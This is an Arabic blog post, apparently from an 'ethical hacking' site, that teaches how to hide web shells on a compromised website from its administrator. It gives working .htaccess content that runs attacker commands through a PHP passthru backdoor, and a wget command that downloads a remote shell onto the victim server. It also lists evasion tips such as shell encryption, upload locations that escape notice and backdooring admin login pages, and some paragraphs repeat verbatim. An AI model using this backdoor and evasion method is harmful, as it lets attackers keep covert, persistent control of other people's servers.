بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته مرحبا بكم في أكاديمية الهكر الأخلاقي
في هده التدونية سنطرح لكم بعض الطرق للتخفي عن أعين صاحب الموقع نبدأ على بركة الله
أولا تشفير الشل مهم جدا في حالة ما قرر صاحب السيرفر عمل بحث عن الدوال
الخبيثة وكان الشل مشفر بشكل قوي فلن يستطيع كشفه .
تاني شئ الابتعاد عن رفع الشل في الأمكنة المعتادة مثل الرئيسة public_html
هدا يسهل كشف أدواتك بسرعة مجرد ما يدخل مدير الموقع سيجد أدوات غريبة وبالتالي سيحدفه
تالث شي الابتعاد عن رفع الشل مثل في مجلد cgi-bin لأنه يتأرشف وبالتالي سيصبح عرضة للدوركات :p
الخبيثة وكان الشل مشفر بشكل قوي فلن يستطيع كشفه .
تاني شئ الابتعاد عن رفع الشل في الأمكنة المعتادة مثل الرئيسة public_html
هدا يسهل كشف أدواتك بسرعة مجرد ما يدخل مدير الموقع سيجد أدوات غريبة وبالتالي سيحدفه
تالث شي الابتعاد عن رفع الشل مثل في مجلد cgi-bin لأنه يتأرشف وبالتالي سيصبح عرضة للدوركات :p
حسنا الأن نمر للتلغيم نعمل ملف . htaccess في الرئيسية من الشل ونضع محتواه
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
جيد الأن يمكننا تطبيق الأوامر من خلال استدعاء الملف
www.site.com/.htaccess?cmd=
جيد الأن نرفع شل عن طريق الأمر
yoursite.com/.htaccess?cmd=wget -O shell.php www.shellsite.com/shell.txt
طبعا مكا www.shellsite.com/shell.txt رابط أي شل مرفوع بصيغة txt
اوكي الأن بعدما نطبق الأمر سيرفع معنا شل بصيغة php على هدا المسار
www.site.com/shell.php
نكمل سنستعمل نفس الفكرة السابقة هده المرة سنعدل على أحد الملفات شرحت لكم بالفيديو الطريقة :
الملف المستخدم في الشرح :
تجدر الاشارة الى ان هناك طرق اخرى للتخفي منها عمل خدعة Not Found
للملف رفع او شل كما يمكن تلغيم لوحات دخول الأدمين .
الى هنا ينتهي الشرح نلتقي بكم في مواضيع أخرى .
ليست هناك تعليقات:
إرسال تعليق